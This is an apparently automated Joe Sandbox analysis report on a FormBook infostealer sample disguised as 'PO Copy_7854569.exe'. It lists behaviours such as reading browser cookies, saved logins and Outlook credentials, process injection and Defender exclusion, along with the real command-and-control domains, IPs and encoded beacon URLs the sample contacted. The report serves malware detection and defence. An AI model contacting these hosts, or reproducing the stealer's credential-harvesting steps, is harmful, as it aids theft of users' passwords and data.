            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0041824F I_ScRpcBindA,6_2_0041824F

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446507 Sample: PO Copy_7854569.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 34 www.ratulunabet78.xyz 2->34 36 www.crimsoncascade.xyz 2->36 38 21 other IPs or domains 2->38 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for URL or domain 2->50 54 10 other signatures 2->54 10 PO Copy_7854569.exe 4 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 36->52 process4 signatures5 66 Adds a directory exclusion to Windows Defender 10->66 68 Injects a PE file into a foreign processes 10->68 13 PO Copy_7854569.exe 10->13         started        16 powershell.exe 23 10->16         started        18 PO Copy_7854569.exe 10->18         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 20 sXAKgqpSAiGEzhyDsUSKBxPWz.exe 13->20 injected 72 Loading BitLocker PowerShell Module 16->72 23 conhost.exe 16->23         started        process8 signatures9 56 Found direct / indirect Syscall (likely to bypass EDR) 20->56 25 openfiles.exe 13 20->25         started        process10 signatures11 58 Tries to steal Mail credentials (via file / registry access) 25->58 60 Tries to harvest and steal browser information (history, passwords, etc) 25->60 62 Modifies the context of a thread in another process (thread injection) 25->62 64 2 other signatures 25->64 28 sXAKgqpSAiGEzhyDsUSKBxPWz.exe 25->28 injected 32 firefox.exe 25->32         started        process12 dnsIp13 40 tintasmaiscor.com 162.240.81.18, 53654, 53655, 53656 UNIFIEDLAYER-AS-1US United States 28->40 42 gregoriusalvin.com 103.247.10.164, 53652, 80 RUMAHWEB-AS-IDRumahwebIndonesiaCVID Indonesia 28->42 44 8 other IPs or domains 28->44 74 Found direct / indirect Syscall (likely to bypass EDR) 28->74 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO Copy_7854569.exe46%VirustotalBrowse
            PO Copy_7854569.exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun
            PO Copy_7854569.exe100%AviraTR/AD.Swotter.xdjgl
            PO Copy_7854569.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            gregoriusalvin.com0%VirustotalBrowse
            ratulunabet78.xyz2%VirustotalBrowse
            tintasmaiscor.com0%VirustotalBrowse
            www.crimsoncascade.xyz0%VirustotalBrowse
            www.gregoriusalvin.com0%VirustotalBrowse
            www.leaflearn.store2%VirustotalBrowse
            digitoxmarketing.com1%VirustotalBrowse
            xn--bb55rtp-9va2p.store2%VirustotalBrowse
            fidyart.com1%VirustotalBrowse
            www.xn--bb55rtp-9va2p.store1%VirustotalBrowse
            www.gcashservice247.com3%VirustotalBrowse
            www.designsbysruly.com0%VirustotalBrowse
            www.tintasmaiscor.com0%VirustotalBrowse
            www.infomail.website0%VirustotalBrowse
            www.fidyart.com1%VirustotalBrowse
            www.ratulunabet78.xyz2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.litespeedtech.com/error-page0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.fidyart.com/a42m/0%Avira URL Cloudsafe
            http://www.6whebx.cyou/a42m/?R0nl4=f64p&vH5=nLiHY6ZlzAe25GxlmAxaMXLPD/QIkKTmL2k396ng4hoKCGGx5/R6Lgv+VE3CAus50oYKw0M+CtaS1Cqyitq9Qy6dvHCDxXkEGnRvDu59ECZqrIMOmhT00aeob0V7fCoJ5Q==0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.xn--bb55rtp-9va2p.store/a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g==100%Avira URL Cloudmalware
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://browsehappy.com/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.digitoxmarketing.com/a42m/0%Avira URL Cloudsafe
            http://www.ratulunabet78.xyz/a42m/100%Avira URL Cloudmalware
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.fidyart.com/a42m/3%VirustotalBrowse
            http://www.p65cq675did.shop/a42m/0%Avira URL Cloudsafe
            https://browsehappy.com/0%VirustotalBrowse
            http://digitoxmarketing.com/a42m/?R0nl4=f64p&vH5=R4g0iLEn0%Avira URL Cloudsafe
            http://www.crimsoncascade.xyz/a42m/0%Avira URL Cloudsafe
            http://www.p65cq675did.shop/a42m/?vH5=vQQIiwhFgpVoGnhhtc2P1VILfyaWtEv7qbiLczs1d6+poiTW6QrgALxDe+CMs+NuEeSHyk/V30WhMaxjncGhKZCgCMKVtFum7SXMM5CUlA+qFcg/x36UpY0MC+LaLW6wHA==&R0nl4=f64p0%Avira URL Cloudsafe
            http://www.digitoxmarketing.com/a42m/1%VirustotalBrowse
            http://www.ratulunabet78.xyz100%Avira URL Cloudmalware
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.leaflearn.store/a42m/0%Avira URL Cloudsafe
            http://www.xn--bb55rtp-9va2p.store/a42m/100%Avira URL Cloudmalware
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://www.ratulunabet78.xyz/a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64p100%Avira URL Cloudmalware
            http://www.p65cq675did.shop/a42m/0%VirustotalBrowse
            http://www.6whebx.cyou/a42m/0%Avira URL Cloudsafe
            http://www.gregoriusalvin.com/a42m/?R0nl4=f64p&vH5=6CH/YRMAK7aydmoZX4rE3aHTO96gtIC3593I/qH1Euv5gdtO1aVIaIsEnNz/XwGPewRjk6ONG4Ys+seqd2cELhY1N+SfeluTEbHos+Hkwv+a06EBMG8yJcZA+l8yWcOKFg==0%Avira URL Cloudsafe
            http://www.tintasmaiscor.com/a42m/?R0nl4=f64p&vH5=BaBbynwG2FaMiw+m+oe/pVgQl9HtQpBnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0AZj8SPVeonrFiOinbxCwnOWiWMOKy28ccO1L5nk/mSSCeg==0%Avira URL Cloudsafe
            http://www.crimsoncascade.xyz/a42m/?vH5=OaCxij+az8CWZkVSgZ9BvYP+nrAHPzHJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQ4sIJ7tOHf1xt78d5/aV4E0eta/TI3w61kMO4VihKAD9uew==&R0nl4=f64p0%Avira URL Cloudsafe
            http://www.fidyart.com/a42m/?vH5=TRa47sC0zg9DwlJApIa9TKXT0LmdSyPROaHr8XI2UWJs85O5KJ5vgIdD5G7YtksjxwnhYTkQf9KJFjTFonbd3AHZxsuWNHNjjLjlx6sM8JLXfuIwaQjmht/eByOeQ7cAZg==&R0nl4=f64p0%Avira URL Cloudsafe
            http://www.leaflearn.store/a42m/?R0nl4=f64p&vH5=q82ug4hJ4iMW1QeZ+GCgoJbZS3jVtW+Vvu2ntYvjkNah5D8fKd1XYREKBHF28ngiXJtWR4/9FoDVe0EJ2zKZXh/HzsdFhnk2W05Rc4EGYuWHBokuuF9nEMUprlqBVZ4vog==0%Avira URL Cloudsafe
            http://www.tintasmaiscor.com/a42m/0%Avira URL Cloudsafe
            https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            gregoriusalvin.com
            		103.247.10.164
            		truetrueunknown
            www.6whebx.cyou
            		192.74.233.3
            		truefalse
              		unknown
              k2-ld.wakak1.shop
              		154.55.135.138
              		truefalse
                		unknown
                ratulunabet78.xyz
                		66.29.137.43
                		truetrueunknown
                www.crimsoncascade.xyz
                		162.0.237.22
                		truetrueunknown
                fidyart.com
                		63.250.43.147
                		truefalseunknown
                digitoxmarketing.com
                		104.194.9.31
                		truefalseunknown
                tintasmaiscor.com
                		162.240.81.18
                		truetrueunknown
                www.leaflearn.store
                		89.31.143.90
                		truefalseunknown
                xn--bb55rtp-9va2p.store
                		84.32.84.32
                		truetrueunknown
                www.designsbysruly.com
                		unknown
                		unknowntrueunknown
                www.p65cq675did.shop
                		unknown
                		unknowntrue
                  		unknown
                  www.gcashservice247.com
                  		unknown
                  		unknowntrueunknown
                  www.gregoriusalvin.com
                  		unknown
                  		unknowntrueunknown
                  www.transformthedorm.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.infomail.website
                    		unknown
                    		unknowntrueunknown
                    www.digitoxmarketing.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.tintasmaiscor.com
                      		unknown
                      		unknowntrueunknown
                      www.xn--bb55rtp-9va2p.store
                      		unknown
                      		unknowntrueunknown
                      www.fidyart.com
                      		unknown
                      		unknowntrueunknown
                      www.weeveno.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.italiangreyhounds.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ratulunabet78.xyz
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.fidyart.com/a42m/false
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.xn--bb55rtp-9va2p.store/a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g==true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.6whebx.cyou/a42m/?R0nl4=f64p&vH5=nLiHY6ZlzAe25GxlmAxaMXLPD/QIkKTmL2k396ng4hoKCGGx5/R6Lgv+VE3CAus50oYKw0M+CtaS1Cqyitq9Qy6dvHCDxXkEGnRvDu59ECZqrIMOmhT00aeob0V7fCoJ5Q==false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.digitoxmarketing.com/a42m/false
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ratulunabet78.xyz/a42m/false
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.p65cq675did.shop/a42m/false
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.crimsoncascade.xyz/a42m/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.p65cq675did.shop/a42m/?vH5=vQQIiwhFgpVoGnhhtc2P1VILfyaWtEv7qbiLczs1d6+poiTW6QrgALxDe+CMs+NuEeSHyk/V30WhMaxjncGhKZCgCMKVtFum7SXMM5CUlA+qFcg/x36UpY0MC+LaLW6wHA==&R0nl4=f64pfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.leaflearn.store/a42m/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.xn--bb55rtp-9va2p.store/a42m/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.ratulunabet78.xyz/a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64pfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.gregoriusalvin.com/a42m/?R0nl4=f64p&vH5=6CH/YRMAK7aydmoZX4rE3aHTO96gtIC3593I/qH1Euv5gdtO1aVIaIsEnNz/XwGPewRjk6ONG4Ys+seqd2cELhY1N+SfeluTEbHos+Hkwv+a06EBMG8yJcZA+l8yWcOKFg==true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.6whebx.cyou/a42m/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tintasmaiscor.com/a42m/?R0nl4=f64p&vH5=BaBbynwG2FaMiw+m+oe/pVgQl9HtQpBnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0AZj8SPVeonrFiOinbxCwnOWiWMOKy28ccO1L5nk/mSSCeg==true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.crimsoncascade.xyz/a42m/?vH5=OaCxij+az8CWZkVSgZ9BvYP+nrAHPzHJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQ4sIJ7tOHf1xt78d5/aV4E0eta/TI3w61kMO4VihKAD9uew==&R0nl4=f64ptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fidyart.com/a42m/?vH5=TRa47sC0zg9DwlJApIa9TKXT0LmdSyPROaHr8XI2UWJs85O5KJ5vgIdD5G7YtksjxwnhYTkQf9KJFjTFonbd3AHZxsuWNHNjjLjlx6sM8JLXfuIwaQjmht/eByOeQ7cAZg==&R0nl4=f64pfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.leaflearn.store/a42m/?R0nl4=f64p&vH5=q82ug4hJ4iMW1QeZ+GCgoJbZS3jVtW+Vvu2ntYvjkNah5D8fKd1XYREKBHF28ngiXJtWR4/9FoDVe0EJ2zKZXh/HzsdFhnk2W05Rc4EGYuWHBokuuF9nEMUprlqBVZ4vog==false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tintasmaiscor.com/a42m/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabopenfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.litespeedtech.com/error-pageopenfiles.exe, 00000008.00000002.4441849151.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2677536768.000000003A8FC000.00000004.80000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://browsehappy.com/openfiles.exe, 00000008.00000002.4441849151.0000000006086000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000004396000.00000004.00000001.00040000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.ecosia.org/newtab/openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://digitoxmarketing.com/a42m/?R0nl4=f64p&vH5=R4g0iLEnopenfiles.exe, 00000008.00000002.4441849151.000000000653C000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.000000000484C000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ac.ecosia.org/autocomplete?q=openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.ratulunabet78.xyzsXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4442575534.0000000005631000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://nginx.net/openfiles.exe, 00000008.00000002.4441849151.0000000005BD0000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003EE0000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://fedoraproject.org/openfiles.exe, 00000008.00000002.4441849151.0000000005BD0000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003EE0000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchopenfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO Copy_7854569.exe, 00000000.00000002.1985288574.000000000323D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostingeropenfiles.exe, 00000008.00000002.4443750014.0000000007780000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          162.240.81.18
                          		tintasmaiscor.comUnited States
                          		46606UNIFIEDLAYER-AS-1UStrue
                          162.0.237.22
                          		www.crimsoncascade.xyzCanada
                          		22612NAMECHEAP-NETUStrue
                          103.247.10.164
                          		gregoriusalvin.comIndonesia
                          		58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDtrue
                          192.74.233.3
                          		www.6whebx.cyouUnited States
                          		54600PEGTECHINCUSfalse
                          84.32.84.32
                          		xn--bb55rtp-9va2p.storeLithuania
                          		33922NTT-LT-ASLTtrue
                          104.194.9.31
                          		digitoxmarketing.comUnited States
                          		23470RELIABLESITEUSfalse
                          154.55.135.138
                          		k2-ld.wakak1.shopUnited States
                          		174COGENT-174USfalse
                          63.250.43.147
                          		fidyart.comUnited States
                          		22612NAMECHEAP-NETUSfalse
                          89.31.143.90
                          		www.leaflearn.storeGermany
                          		15598QSC-AG-IPXDEfalse
                          66.29.137.43
                          		ratulunabet78.xyzUnited States
                          		19538ADVANTAGECOMUStrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1446507
                          Start date and time:2024-05-23 15:15:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 39s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:PO Copy_7854569.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@12/7@23/10
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 118
                          • Number of non-executed functions: 314
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target sXAKgqpSAiGEzhyDsUSKBxPWz.exe, PID 7128 because it is empty
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          09:15:51API Interceptor1x Sleep call for process: PO Copy_7854569.exe modified
                          09:15:53API Interceptor11x Sleep call for process: powershell.exe modified
                          09:16:44API Interceptor11423051x Sleep call for process: openfiles.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.240.81.18SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                          • www.upshercode.store/x98j/
                          F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
